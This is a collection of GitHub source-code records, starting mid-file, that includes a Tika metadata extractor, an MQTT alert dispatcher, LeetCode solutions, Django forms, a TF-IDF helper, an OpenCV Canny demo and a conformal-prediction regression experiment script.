average the parsed integers, not the raw strings\n print(res)\n return res\n # r = r.replace(re.findall(pattern_k, r)[0], '')\n # return refined_digit(r.replace(',', ''))[0]\n\n\ndef refined_digit(s):\n pattern = r'\\d+'\n r = re.findall(pattern, s)\n return r\n\n\ndef main():\n with open('strings1.csv') as file:\n order = ['string', 'type', 'price']\n reader = csv.DictReader(file, fieldnames=order)\n pattern_None = 
'\\d[\\']'\n pattern_million = 'million'\n pattern_k = '\\d[kK]'\n # pattern_m = '\\d[mM][\\D][^\\']'\n pattern_perc = '\\d[%]'\n pattern_aver = '\\d+[^%km]'\n # patterm_difference =\n for r in reader:\n if re.search(pattern_None, r['string']):\n print(r['string'])\n print(\"None_\")\n elif re.search(pattern_million, r['string']):\n print(r['string'])\n print('million_')\n elif re.search(pattern_k, r['string']):\n print(r['string'])\n print(refined_k(r['string']))\n elif re.search(pattern_perc, r['string']):\n print(r['string'])\n print(refined_perc(r['string']))\n # elif re.search(pattern_m, r['string']):\n # print(refined_m(r['string']))\n elif re.search(pattern_aver, r['string']):\n print(r['string'])\n print(refined_aver(r['string']))\n else:\n print('else ' + str(r))\n\n\nif __name__ == '__main__':\n main()","repo_name":"kalilask4/parsers","sub_path":"ex2_get_ int_ price/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23443214877","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nimport re\nimport os\nimport json\n\n\nimport gransk.core.helper as helper\nimport gransk.core.abstract_subscriber as abstract_subscriber\nimport six\n\n\nclass Subscriber(abstract_subscriber.Subscriber):\n \"\"\"Class for extracting metadata from documents using Apache Tika.\"\"\"\n CONSUMES = [helper.EXTRACT_META]\n\n def setup(self, config):\n \"\"\"\n Load mediatype mapping from file. This is used to determine document type.\n\n :param config: Configuration object.\n :type config: ``dict``\n \"\"\"\n self.config = config\n typecache = {}\n media_path = os.path.join(\n config[helper.CODE_ROOT], 'utils', 'media_types.txt')\n\n with open(media_path) as inp:\n current = None\n for line in inp:\n if len(line.strip()) == 0 or line.startswith('#'):\n continue\n\n if line.strip().startswith('-'):\n apptype = line.strip().partition('-')[2]\n apptype = apptype.strip()\n typecache[current].append(re.escape(apptype))\n else:\n current = line.strip()\n typecache[current] = []\n\n pattern_list = []\n\n for _type, patterns in typecache.items():\n pattern_list.append(u'(?P<%s>(%s))' % (_type, u'|'.join(patterns)))\n\n self.typepattern = re.compile(u'|'.join(pattern_list), re.I)\n\n def __extract_metadata(self, doc, payload):\n filename = os.path.basename(doc.path).encode('utf-8')\n files = {\n 'Accept': 'application/json',\n 'Content-Disposition': 'attachment; filename=%s' % filename\n }\n\n payload.seek(0)\n connection = self.config[helper.INJECTOR].get_http_connection()\n connection.request('PUT', '/meta', payload.read(), files)\n payload.seek(0)\n\n response = connection.getresponse()\n\n result = json.loads(response.read().decode('utf-8'))\n\n response.close()\n\n return result\n\n def consume(self, doc, payload):\n \"\"\"\n Upload document to Apache Tika and parse results.\n\n :param doc: Document object.\n :param payload: File pointer beloning to document.\n :type doc: ``gransk.core.document.Document``\n :type payload: ``file``\n \"\"\"\n meta = {}\n\n max_size = self.config.get(helper.MAX_FILE_SIZE, 0)\n\n if max_size > 0 and doc.meta['size'] > max_size:\n return\n\n try:\n meta = self.__extract_metadata(doc, payload)\n application_type = meta.get(u'Content-Type')\n for match in self.typepattern.finditer(application_type):\n doc.set_type(match.lastgroup)\n except Exception as err:\n doc.meta['meta_error'] = six.text_type(err)\n\n for key, 
value in meta.items():\n doc.meta[key.replace('.', '_').replace(':', '_')] = value\n","repo_name":"toshisam/gransk","sub_path":"gransk/plugins/extractors/file_meta.py","file_name":"file_meta.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"630688465","text":"from typing import List\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n noOfIslands = 0\n\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if grid[i][j] == '1':\n self.markIsland(grid, i, j)\n noOfIslands += 1\n\n return noOfIslands\n\n def markIsland(self, grid, i, j):\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]) or grid[i][j] != '1':\n return\n\n grid[i][j] = '2'\n\n self.markIsland(grid, i + 1, j)\n self.markIsland(grid, i - 1, j)\n self.markIsland(grid, i, j + 1)\n self.markIsland(grid, i, j - 1)\n\n\nsolution = Solution()\ngrid1 = [[\"1\", \"1\", \"1\", \"1\", \"0\"], [\"1\", \"1\", \"0\", \"1\", \"0\"], [\"1\", \"1\", \"0\", \"0\", \"0\"], [\"0\", \"0\", \"0\", \"0\", \"0\"]]\ngrid2 = [[\"1\",\"1\",\"0\",\"0\",\"0\"], [\"1\",\"1\",\"0\",\"0\",\"0\"], [\"0\",\"0\",\"1\",\"0\",\"0\"], [\"0\",\"0\",\"0\",\"1\",\"1\"]]\nassert solution.numIslands(grid1) == 1\nassert solution.numIslands(grid2) == 3","repo_name":"kalyansikdar/LeetCode","sub_path":"Graph/DFS/NumberOfIslands.py","file_name":"NumberOfIslands.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6684525393","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport uuid\nimport json\nimport gmqtt\nimport asyncio\nimport signal\nimport logging\nimport falcon\nimport falcon_jsonify\nimport time\n\nfrom chariot_base.connector import LocalConnector\n\nfrom chariot_northbound_dispatcher import __service_name_listener__\nfrom chariot_northbound_dispatcher.dispatcher import Dispatcher\nfrom chariot_base.utilities import open_config_file, Tracer\nfrom chariot_base.connector import LocalConnector, create_client\n\n\nclass SouthboundConnector(LocalConnector):\n def __init__(self, options):\n super(SouthboundConnector, self).__init__()\n self.dispatcher = None\n\n def on_message(self, client, topic, payload, qos, properties):\n msg = payload.decode('utf-8')\n deserialized_model = json.loads(msg)\n logging.debug(f'Receive messages: {deserialized_model}')\n span = self.start_span_from_message('on_message', deserialized_model)\n try:\n self.dispatcher.forward(deserialized_model, span)\n self.close_span(span)\n except Exception as ex:\n self.error(span, ex)\n self.close_span(span)\n logging.error(ex)\n\n def inject_dispatcher(self, dispatcher):\n self.dispatcher = dispatcher\n\n def on_connect(self, client, flags, rc, properties=None):\n self.connected = True\n self.connack = (flags, rc, properties)\n if rc == 0:\n self.subscribe_to_topics()\n\n def set_topics(self, topics):\n self.topics = topics\n\n def subscribe_to_topics(self):\n subscriptions = []\n for topic in self.topics:\n subscriptions.append(gmqtt.Subscription(topic, qos=1))\n self.client.subscribe(subscriptions, subscription_identifier=2)\n logging.info('Waiting for raised alerts...')\n\nclass NorthboundConnector(LocalConnector):\n def __init__(self, options):\n super(NorthboundConnector, self).__init__()\n\n\nSTOP = asyncio.Event()\n\n\ndef ask_exit(*args):\n logging.info('Stoping....')\n STOP.set()\n\n\nasync def main(args=None):\n\n opts = open_config_file()\n\n options_engine = 
opts.northbound_dispatcher\n options_tracer = opts.tracer\n\n tracer = None\n if options_tracer['enabled']:\n options_tracer['service'] = __service_name_listener__\n logging.debug(f'Enabling tracing for service \"{__service_name_listener__}\"')\n tracer = Tracer(options_tracer)\n tracer.init_tracer()\n\n southbound = SouthboundConnector(options_engine)\n southbound.inject_tracer(tracer)\n client_south = await create_client(opts.brokers.southbound)\n southbound.register_for_client(client_south)\n\n northbound = NorthboundConnector(options_engine)\n northbound.inject_tracer(tracer)\n client_north = await create_client(opts.brokers.northbound)\n northbound.register_for_client(client_north)\n\n dispatcher = Dispatcher(options_engine)\n southbound.inject_dispatcher(dispatcher)\n dispatcher.inject(southbound, northbound)\n dispatcher.inject_tracer(tracer)\n\n dispatcher.subscribe_to_southbound()\n\n logging.info('Waiting message from Privacy Engine')\n await STOP.wait()\n await client_south.disconnect()\n await client_north.disconnect()\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n\n loop.add_signal_handler(signal.SIGINT, ask_exit)\n loop.add_signal_handler(signal.SIGTERM, ask_exit)\n\n loop.run_until_complete(main())\n logging.info('Stopped....')","repo_name":"charIoT-h2020/chariot-northbound-dispatcher","sub_path":"chariot_northbound_dispatcher/digester.py","file_name":"digester.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26721361618","text":"import subprocess\n\nimport typer_cloup as typer\nfrom docs_src.parameter_types.enum import tutorial001 as mod\nfrom typer_cloup.testing import CliRunner\n\nrunner = CliRunner()\n\napp = typer.Typer()\napp.command()(mod.main)\n\n\ndef test_help():\n result = runner.invoke(app, [\"--help\"])\n assert result.exit_code == 0\n assert \"--network [simple|conv|lstm]\" in result.output\n\n\ndef test_main():\n result = runner.invoke(app, [\"--network\", \"conv\"])\n assert result.exit_code == 0\n assert \"Training neural network of type: conv\" in result.output\n\n\ndef test_invalid():\n result = runner.invoke(app, [\"--network\", \"capsule\"])\n assert result.exit_code != 0\n assert (\n \"Error: Invalid value for '--network': 'capsule' is not one of 'simple', 'conv', 'lstm'\"\n in result.output\n )\n\n\ndef test_script():\n result = subprocess.run(\n [\"coverage\", \"run\", mod.__file__, \"--help\"],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n encoding=\"utf-8\",\n )\n assert \"Usage\" in result.stdout\n","repo_name":"alexreg/typer-cloup","sub_path":"tests/test_tutorial/test_parameter_types/test_enum/test_tutorial001.py","file_name":"test_tutorial001.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"22081065830","text":"class Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n \n d={}\n for i in range(len(order)):\n d[order[i]] = i\n \n for i in range(1, len(words)):\n # word1 = words[i-1]\n # word2 = words[i]\n smaller = len(words[i-1]) if len(words[i-1]) < len(words[i]) else len(words[i])\n areSame = True\n for j in range(smaller):\n diff = d[words[i][j]] - d[words[i-1][j]]\n if diff < 0: \n return False\n if diff > 0: \n areSame = False\n break\n \n if areSame and len(words[i]) < len(words[i-1]):\n return False\n \n return True\n \n \n \n \n \n \n\n# areSame = True\n# for item in letters:\n# diff = 
d[item[0]] - d[item[1]]\n# if diff < 0:\n# return False\n# if diff > 0:\n# areSame = False","repo_name":"umarf2212/LeetCode","sub_path":"problems/verifying_an_alien_dictionary/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"589456143","text":"import math\n\n# used by the tf function\ndef max_term_in_d(d_terms_list):\n return max([d_terms_list.count(i) / len(d_terms_list) for i in d_terms_list])\n\ndef tf(term,d_terms_list):\n return 0.5 + 0.5 * ((d_terms_list.count(term)/ len(d_terms_list)) / max_term_in_d(d_terms_list))\n\n# used by the idf function\ndef num_docs_has_the_term(term,list_of_document):\n count = 0\n for i in list_of_document:\n if term in i:\n count += 1\n return count\n\ndef idf(term,list_of_documents):\n if num_docs_has_the_term(term,list_of_documents):\n return math.log(len(list_of_documents) / num_docs_has_the_term(term,list_of_documents))\n\n\ndef tfidf(t,d,D):\n if idf(t,D):\n return tf(t,d) * idf(t,D)\n else: return 0\n\n\n\n\"\"\"\ngiven a list of docs of terms, this function returns the average tf-idf score of each term across all of the label's docs\n\"\"\"\ndef calculate_tfidf_with_averege(docs_label,all_docs,label):\n score_shits = {}\n for doc in docs_label:\n # record the score for each term only once per document\n checked = []\n for term in doc:\n if term not in checked:\n if term not in score_shits.keys():\n score_shits[term] = {'label': label, 'score': 0, 'counter': 0}\n score_shits[term]['score'] += tfidf(term, doc, all_docs)\n score_shits[term]['counter'] += 1\n checked.append(term)\n # calc the average\n for term in score_shits:\n score_shits[term]['score'] /= score_shits[term]['counter']\n return score_shits\n\n","repo_name":"avratech7/CORE","sub_path":"Algorithem_Porush.py","file_name":"Algorithem_Porush.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"34645143980","text":"print()\nprint('Foram anotadas as idades e alturas de 30 alunos. Faça um Programa que determine')\nprint('quantos alunos com mais de 13 anos possuem altura inferior à média de altura desses alunos.')\nprint()\nprint('-=' * 30)\nperfil = [1.70, 14, 1.60, 12, 1.65, 11, 1.80, 15, 1.58, 14, 1.62, 12, 1.53, 11, 1.72, 14, 1.50, 8, 1.60, 14]\nalturas = []\nv = 1\nfor c in range(1, 11):\n if perfil[v] > 13:\n alturas.append(perfil[v - 1])\n v += 2\nprint(alturas)\nsoma = 0\ng = 0\nfor c in range(1, 11):\n soma += perfil[g]\n g += 2\nmedia = soma / 10\n\nalunos_menor = 0\nfor c in alturas:\n if c < media:\n alunos_menor += 1\nprint(f'O total de {alunos_menor} com mais de 13 anos, estao com alturas inferiores a media')","repo_name":"Felipecard/Codigos-Exercicios-Python","sub_path":"4. 
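A short usage sketch for the TF-IDF helpers in the record above, on invented toy documents; tf is the augmented frequency 0.5 + 0.5 * (f / f_max) and idf is ln(N / df):

toy_docs = [["cat", "sat", "mat"], ["dog", "sat", "log"], ["cat", "dog"]]
# "cat" appears in 2 of the 3 documents, so idf("cat", toy_docs) == math.log(3 / 2).
print(tfidf("cat", toy_docs[0], toy_docs))  # 1.0 * ln(1.5), roughly 0.405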
Listas/Alunos com certa idade, a baixo da altura.py","file_name":"Alunos com certa idade, a baixo da altura.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34557482350","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import validate_image_file_extension\n\nfrom kitchen.models import Cook, Dish\n\n\nclass CookCreationForm(UserCreationForm):\n\n class Meta(UserCreationForm.Meta):\n model = Cook\n fields = UserCreationForm.Meta.fields + (\n \"first_name\",\n \"last_name\",\n \"email\",\n \"years_of_experience\",\n\n )\n\n\nclass DishForm(forms.ModelForm):\n cooks = forms.ModelMultipleChoiceField(\n queryset=get_user_model().objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False\n )\n dish_image = forms.ImageField(\n validators=[validate_image_file_extension],\n required=False\n )\n\n class Meta:\n model = Dish\n fields = \"__all__\"\n\n def clean_price(self):\n price = self.cleaned_data[\"price\"]\n\n if price < 0:\n raise ValidationError(\"Price must be greater than 0.\")\n\n return price\n\n\nclass DishTypeSearchForm(forms.Form):\n name = forms.CharField(\n max_length=255,\n required=False,\n label=\"\",\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by name...\"})\n )\n\n\nclass DishSearchForm(forms.Form):\n name = forms.CharField(\n max_length=255,\n required=False,\n label=\"\",\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by name...\"})\n )\n\n\nclass CookSearchForm(forms.Form):\n username = forms.CharField(\n max_length=255,\n required=False,\n label=\"\",\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by username...\"})\n )\n","repo_name":"alina-boichenko/restaurant_kitchen_service","sub_path":"kitchen/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4185735919","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimage = cv2.imread('./public/images/image.jpeg', cv2.IMREAD_GRAYSCALE)\n\nedges_canny = cv2.Canny(image,100,200)\n\nplt.figure(figsize=(10,5))\nplt.subplot(121), plt.imshow(image, cmap='gray')\nplt.title('Orijinal Görüntü'), plt.axis('off')\nplt.subplot(122), plt.imshow(edges_canny, cmap='gray')\nplt.title('Canny Kenar Dedektörü'), plt.axis('off')\nplt.show()","repo_name":"muratgulcan/opencv_playground","sub_path":"tests/opencv_lesson8_canny.py","file_name":"opencv_lesson8_canny.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18435976099","text":"\"\"\"\r\nSCRIPT FOR APPLYING SINGLE-TARGET CONFORMAL REGRESSION\r\nWITH A SINGLE-TARGET UNDERLYING MODEL\r\n\"\"\"\r\n\r\n# Authors: Mateusz Wiza\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.linear_model import Lasso, Ridge\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom nonconformist.base import RegressorAdapter\r\nfrom nonconformist.icp import IcpRegressor\r\nfrom nonconformist.nc import RegressorNc, AbsErrorErrFunc, RegressorNormalizer\r\nfrom nonconformist.evaluation 
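DishForm.clean_price in the forms record above uses Django's per-field clean hook; a hedged sketch of how the error surfaces (the remaining Dish fields are not shown in the record, so the form would carry other errors too):

form = DishForm(data={"name": "Soup", "price": "-1"})
form.is_valid()                  # False: clean_price raised ValidationError
print(form.errors.get("price"))  # ['Price must be greater than 0.']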
import cross_val_score\r\nfrom nonconformist.evaluation import RegIcpCvHelper\r\nfrom nonconformist.evaluation import reg_mean_errors, reg_median_size, reg_q3_size, reg_q1_size\r\n\r\n\r\ndef apply_cp(features, target, underlying):\r\n \"\"\"Perform not-normalized conformal prediction.\r\n Parameters\r\n ----------\r\n features : numpy array of shape [n_samples, n_features]\r\n Features of each sample\r\n target : numpy array of shape [n_samples]\r\n True output labels of each sample.\r\n underlying : model implementing fit() and predict()\r\n Underlying model for conformal prediction.\r\n Returns\r\n -------\r\n Results cross_val_score() from averaged from the 4 iterations\r\n of cross validation.\r\n \"\"\"\r\n # Adapt underlying model for conformal prediction\r\n u_model = RegressorAdapter(underlying)\r\n # Define the nonconformity function\r\n ncs = RegressorNc(u_model, AbsErrorErrFunc())\r\n # Initialize inductive conformal regressor\r\n icp = IcpRegressor(ncs)\r\n\r\n # Perform cross validation\r\n scores = cross_val_score(RegIcpCvHelper(icp),\r\n features,\r\n target,\r\n iterations=4,\r\n folds=10,\r\n scoring_funcs=[reg_mean_errors, reg_median_size, reg_q1_size, reg_q3_size],\r\n significance_levels=[0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Return results averaged from the 4 iterations of cross validation\r\n return scores.groupby(['significance']).mean()\r\n\r\n\r\ndef apply_norm_cp(features, target, underlying, normalizing):\r\n \"\"\"Perform normalized conformal prediction.\r\n Parameters\r\n ----------\r\n features : numpy array of shape [n_samples, n_features]\r\n Features of each sample\r\n target : numpy array of shape [n_samples]\r\n True output labels of each sample.\r\n underlying : model implementing fit() and predict()\r\n Underlying model for conformal prediction.\r\n normalizing : model implementing fit() and predict()\r\n Normalizing model for conformal prediction.\r\n Returns\r\n -------\r\n Results cross_val_score() from averaged from the 4 iterations\r\n of cross validation.\r\n \"\"\"\r\n # Adapt underlying and normalizing models for conformal prediction\r\n u_model = RegressorAdapter(underlying)\r\n n_model = RegressorAdapter(normalizing)\r\n # Initialize the normalizing model\r\n normalizer = RegressorNormalizer(u_model, n_model, AbsErrorErrFunc())\r\n # Define the nonconformity function\r\n ncs = RegressorNc(u_model, AbsErrorErrFunc(), normalizer)\r\n # Initialize inductive conformal regressor\r\n icp = IcpRegressor(ncs)\r\n\r\n # Perform cross validation\r\n scores = cross_val_score(RegIcpCvHelper(icp),\r\n features,\r\n target,\r\n iterations=4,\r\n folds=10,\r\n scoring_funcs=[reg_mean_errors, reg_median_size, reg_q1_size, reg_q3_size],\r\n significance_levels=[0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Return results averaged from the 4 iterations of cross validation\r\n return scores.groupby(['significance']).mean()\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n# PREPARE DATA\r\n# -----------------------------------------------------------------------------\r\n\r\n# Read data from CSV\r\ndata = pd.read_csv(\"data.csv\", sep=',', encoding='latin-1')\r\n\r\n# Transform categorical variable 'Country' into dummy variables\r\ndummy_country = data['country'].str.get_dummies()\r\ndata = pd.concat([data, dummy_country], axis=1)\r\n\r\n# Remove outliers\r\ndata = data[data['STP_hours'] < 8000]\r\ndata = data[data['avg_dur'] < 15]\r\ndata = data[data['daily_occ_stp'] > 
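A minimal sketch of driving apply_cp from the script above on synthetic data (arrays invented for illustration; assumes the nonconformist package is installed):

import numpy as np
from sklearn.ensemble import RandomForestRegressor

rng = np.random.RandomState(0)
X_demo = rng.rand(200, 5)
y_demo = X_demo.dot(rng.rand(5)) + 0.1 * rng.randn(200)
demo_scores = apply_cp(X_demo, y_demo, RandomForestRegressor(random_state=0))
print(demo_scores[['reg_mean_errors', 'reg_median_size']])  # averaged over the CV iterations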
0]\r\ndata = data[data['daily_occ_stp'] < 1]\r\ndata = data[data['rev_adj'] > 0]\r\ndata = data[data['rev_adj'] < 10000]\r\n\r\n# Select features / inputs\r\ndata_input = data[\r\n ['Size', 'ts', 'comp', 'spaces', 'office_osm', 'shop_osm', 'food_osm', 'all_osm', 'edu_osm', 'health_osm',\r\n 'hotel_osm', 'ind_osm', 'office', 'BE', 'DE', 'FR', 'GB', 'IE', 'NL']]\r\n\r\n# Select targets / outputs\r\ndata_output = data[['STP_hours', 'avg_dur', 'avg_entry', 'daily_occ_stp', 'rev_adj']]\r\n\r\n# Define input and output matrix\r\nY = np.array(data_output)\r\nX = np.array(data_input)\r\n\r\n# Apply 0-1 normalization to the dataset\r\nscaler = MinMaxScaler()\r\nX = scaler.fit_transform(X)\r\nY = scaler.fit_transform(Y)\r\n\r\n# -----------------------------------------------------------------------------\r\n# EXPERIMENTS USING ONE TARGET TO DETERMINE OPTIMAL SOLUTION\r\n# -----------------------------------------------------------------------------\r\n\r\n# Define significance levels and the 'ideal' width of 10% (for plots)\r\nsignificance = [0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\r\nideal = np.ones(len(significance)) * 10\r\n\r\n# 1. Experiment to determine the best performing underlying model\r\nmodels = [Lasso(alpha=5.0),\r\n Ridge(alpha=5.0),\r\n GradientBoostingRegressor(n_estimators=100, learning_rate=0.1, max_depth=1, random_state=1, loss='ls'),\r\n KNeighborsRegressor(n_neighbors=5),\r\n RandomForestRegressor(random_state=22)]\r\n\r\ndf_exp1 = {}\r\n\r\n# Perform conformal prediction using different models\r\nfor model in models:\r\n df_exp1[str(model)[0:2]] = apply_cp(X, Y[:, 4], model)\r\n\r\n# Plot the results (Fig. 1 in report)\r\nfor df in df_exp1:\r\n data = df_exp1[df]\r\n plt.scatter(data.index, data['reg_median_size'] * 100)\r\n plt.plot(data.index, data['reg_median_size'] * 100)\r\n\r\nplt.plot(significance, ideal, '--', color='k', linewidth=0.5)\r\nplt.ylabel('Interval width [%]')\r\nplt.xlabel('Significance level εₜ')\r\nplt.legend(['Lasso', 'Ridge', 'Gradient Boost', 'k-NN', 'Random Forest'])\r\nplt.show()\r\n\r\n# 2. Experiment to determine the best performing normalizing model\r\nunderlying_model = RandomForestRegressor(random_state=22)\r\nnorm_models = [GradientBoostingRegressor(n_estimators=100, learning_rate=0.1, max_depth=1, random_state=1, loss='ls'),\r\n RandomForestRegressor(random_state=15)]\r\n\r\ndf_exp2 = {}\r\n\r\n# Perform normalized conformal prediction using different normalizing models\r\nfor norm_model in norm_models:\r\n df_exp2[str(norm_model)[0:2]] = apply_norm_cp(X, Y[:, 4], underlying_model, norm_model)\r\n\r\n# Plot the results (Fig. 
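The 0-1 scaling above is invertible with the fitted scaler, which matters when reporting interval widths back in the original units; a tiny round-trip sketch (illustrative):

from sklearn.preprocessing import MinMaxScaler
import numpy as np

sc = MinMaxScaler()
demo = np.array([[2.0], [5.0], [11.0]])
scaled = sc.fit_transform(demo)          # min maps to 0, max to 1
restored = sc.inverse_transform(scaled)  # recovers 2, 5, 11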
2 in report)\r\nplt.scatter(data.index, df_exp1['Ra']['reg_median_size'] * 100, color='C4') # Baseline solution\r\nplt.plot(data.index, df_exp1['Ra']['reg_median_size'] * 100, color='C4') # Baseline solution\r\n\r\nfor df in df_exp2:\r\n if df == 'Ra':\r\n c = 'k'\r\n else:\r\n c = 'C8'\r\n data = df_exp2[df]\r\n plt.scatter(data.index, data['reg_median_size'] * 100, color=c)\r\n plt.plot(data.index, data['reg_median_size'] * 100, color=c)\r\n\r\nplt.plot(significance, ideal, '--', color='k', linewidth=0.5)\r\nplt.ylabel('Interval width [%]')\r\nplt.xlabel('Significance level εₜ')\r\nplt.legend(['Not normalized', 'Gradient Boost', 'Random Forest'])\r\nplt.show()\r\n\r\n# -----------------------------------------------------------------------------\r\n# PLOT RESULTS FOR ALL TARGETS USING OPTIMAL BASELINE SOLUTION\r\n# -----------------------------------------------------------------------------\r\nrerun_experiments = False # Set to True to re-run experiments instead of loading results from CSVs\r\n\r\n# Get conformal prediction results by re-running experiments and save to CSV\r\nif rerun_experiments:\r\n normalizing_model = RandomForestRegressor(random_state=15)\r\n\r\n scores_stp = apply_norm_cp(X, Y[:, 0], underlying_model, normalizing_model)\r\n scores_stp.to_csv('graph-data/scores_stp.csv')\r\n\r\n scores_dur = apply_norm_cp(X, Y[:, 1], underlying_model, normalizing_model)\r\n scores_dur.to_csv('graph-data/scores_dur.csv')\r\n\r\n scores_entry = apply_norm_cp(X, Y[:, 2], underlying_model, normalizing_model)\r\n scores_entry.to_csv('graph-data/scores_entry.csv')\r\n\r\n scores_occstp = apply_norm_cp(X, Y[:, 3], underlying_model, normalizing_model)\r\n scores_occstp.to_csv('graph-data/scores_occstp.csv')\r\n\r\n scores_rev = df_exp2['Ra']\r\n scores_rev.to_csv('graph-data/scores_rev.csv')\r\n\r\n# Get conformal prediction results from CSV files\r\nelse:\r\n scores_stp = pd.read_csv(\"graph-data/scores_stp.csv\", sep=',', encoding='latin-1')\r\n scores_dur = pd.read_csv(\"graph-data/scores_dur.csv\", sep=',', encoding='latin-1')\r\n scores_entry = pd.read_csv(\"graph-data/scores_entry.csv\", sep=',', encoding='latin-1')\r\n scores_occstp = pd.read_csv(\"graph-data/scores_occstp.csv\", sep=',', encoding='latin-1')\r\n scores_rev = pd.read_csv(\"graph-data/scores_rev.csv\", sep=',', encoding='latin-1')\r\n\r\n# Plot prediction interval widths (median and IQR)\r\nfig, axs = plt.subplots(nrows=3, ncols=2, figsize=(10, 10))\r\n\r\nax = axs[0, 0]\r\ndiff_q3 = scores_stp['reg_q3_size'] * 100 - scores_stp['reg_median_size'] * 100\r\ndiff_q1 = scores_stp['reg_median_size'] * 100 - scores_stp['reg_q1_size'] * 100\r\nax.errorbar(scores_stp['significance'], scores_stp['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_stp['significance'], scores_stp['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average daily sold parking hours')\r\nax.set_ylabel('Interval width [%]')\r\n\r\nax = axs[0, 1]\r\ndiff_q3 = scores_dur['reg_q3_size'] * 100 - scores_dur['reg_median_size'] * 100\r\ndiff_q1 = scores_dur['reg_median_size'] * 100 - scores_dur['reg_q1_size'] * 100\r\nax.errorbar(scores_dur['significance'], scores_dur['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_dur['significance'], scores_dur['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average duration of stay')\r\n\r\nax = axs[1, 0]\r\ndiff_q3 
= scores_entry['reg_q3_size'] * 100 - scores_entry['reg_median_size'] * 100\r\ndiff_q1 = scores_entry['reg_median_size'] * 100 - scores_entry['reg_q1_size'] * 100\r\nax.errorbar(scores_entry['significance'], scores_entry['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_entry['significance'], scores_entry['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average time of entry')\r\nax.set_ylabel('Interval width [%]')\r\n\r\nax = axs[1, 1]\r\ndiff_q3 = scores_occstp['reg_q3_size'] * 100 - scores_occstp['reg_median_size'] * 100\r\ndiff_q1 = scores_occstp['reg_median_size'] * 100 - scores_occstp['reg_q1_size'] * 100\r\nax.errorbar(scores_occstp['significance'], scores_occstp['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_occstp['significance'], scores_occstp['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average daytime occupancy')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nax = axs[2, 0]\r\ndiff_q3 = scores_rev['reg_q3_size'] * 100 - scores_rev['reg_median_size'] * 100\r\ndiff_q1 = scores_rev['reg_median_size'] * 100 - scores_rev['reg_q1_size'] * 100\r\nax.errorbar(scores_rev.index, scores_rev['reg_median_size'] * 100, yerr=[diff_q1, diff_q3], fmt='--o')\r\nax.scatter(scores_rev.index, scores_rev['reg_median_size'] * 100)\r\nax.plot(scores_stp['significance'], ideal, '--', color='k', linewidth=0.5)\r\nax.set_title('Average daily revenue')\r\nax.set_ylabel('Interval width [%]')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nfig.delaxes(axs[2, 1])\r\nfig.suptitle('Tightness of prediction regions per target ')\r\n\r\nplt.show()\r\n\r\n# Plot empirical 